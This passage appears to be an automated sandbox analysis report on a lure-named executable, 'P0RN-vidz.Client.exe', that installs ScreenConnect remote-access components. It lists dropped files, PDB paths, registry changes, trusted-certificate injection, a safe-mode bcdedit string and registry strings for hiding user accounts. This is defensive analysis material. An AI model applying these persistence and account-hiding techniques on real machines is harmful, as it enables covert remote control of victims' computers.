                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: P0RN-vidz.Client.exeStatic PE information: certificate valid
                  Source: P0RN-vidz.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: P0RN-vidz.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: P0RN-vidz.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: P0RN-vidz.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: P0RN-vidz.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: P0RN-vidz.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: P0RN-vidz.Client.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: P0RN-vidz.Client.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: P0RN-vidz.Client.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26ECB000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26B68000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2523805128.0000000002BE2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.3279854625.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000D.00000002.3279616010.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000B.00000000.2517771786.000000000008D000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A02000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A02000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27211000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270DE000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26D14000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2530636996.000000001BEC2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbi source: dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26D19000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270E2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527690539.0000000002ED2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A09000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26D19000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C270E2000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527690539.0000000002ED2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A09000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: System.pdb source: ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A02000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26B6C000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000B.00000002.2524088311.0000000005242000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.ClientService.exe, 0000000C.00000002.3298916136.0000000005A02000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: P0RN-vidz.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: P0RN-vidz.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: P0RN-vidz.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: P0RN-vidz.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: P0RN-vidz.Client.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.drStatic PE information: 0x82BC4119 [Mon Jul 4 06:58:33 2039 UTC]
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00371000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00371000
                  Source: P0RN-vidz.Client.exeStatic PE information: real checksum: 0x20116 should be: 0x1f7b8
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00371BC0 push ecx; ret 0_2_00371BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848D5D2A5 pushad ; iretd 1_2_00007FF848D5D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E77D00 push eax; retf 1_2_00007FF848E77D1D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E700BD pushad ; iretd 1_2_00007FF848E700C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E7845E push eax; ret 1_2_00007FF848E7846D
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FF848E7842E pushad ; ret 1_2_00007FF848E7845D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848E6413A pushad ; ret 10_2_00007FF848E6413B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848E7845E push eax; ret 10_2_00007FF848E7846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848E7842E pushad ; ret 10_2_00007FF848E7845D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848E616F0 push ebx; retf 0001h10_2_00007FF848E6175A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848E616D1 push ebx; retf 0001h10_2_00007FF848E6175A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848E62E40 pushad ; ret 10_2_00007FF848E62E73
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848E63FF2 pushad ; iretd 10_2_00007FF848E63FF3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848E61750 push ebx; retf 0001h10_2_00007FF848E6175A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848E630B2 pushad ; iretd 10_2_00007FF848E630B3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF848E72BBA push eax; retf 13_2_00007FF848E72BBB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF848E700BD pushad ; iretd 13_2_00007FF848E700C1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF849185CA1 push ds; ret 13_2_00007FF84918620F
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF849185CA1 push ecx; retn 5F1Ch13_2_00007FF8491862DC
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF849181688 push eax; iretd 13_2_00007FF84918168A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FF849185FD4 push ds; ret 13_2_00007FF84918620F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_b52ff71be5e12d6d\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..core_4b14c015c87c1ad8_0018.0004_none_53e91df7fcfd4a60\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..dows_4b14c015c87c1ad8_0018.0004_none_5860f5d9394b5d90\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre...exe_25b0fbb6ef7eb094_0018.0004_none_987fbc6c413248ec\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..vice_4b14c015c87c1ad8_0018.0004_none_053cb64092bcadcb\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..ient_4b14c015c87c1ad8_0018.0004_none_e9fe7bca0c4ca064\ScreenConnect.Client.dllJump to dropped file
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (efdde9f7-b36a-4379-90c6-ca6ccaf179c1)

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Contains functionality to hide user accounts
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2530636996.000000001BEC2000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.2523805128.0000000002BE2000.00000002.00000001.01000000.0000000E.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.3279854625.00000000026E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.3279616010.00000000024A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
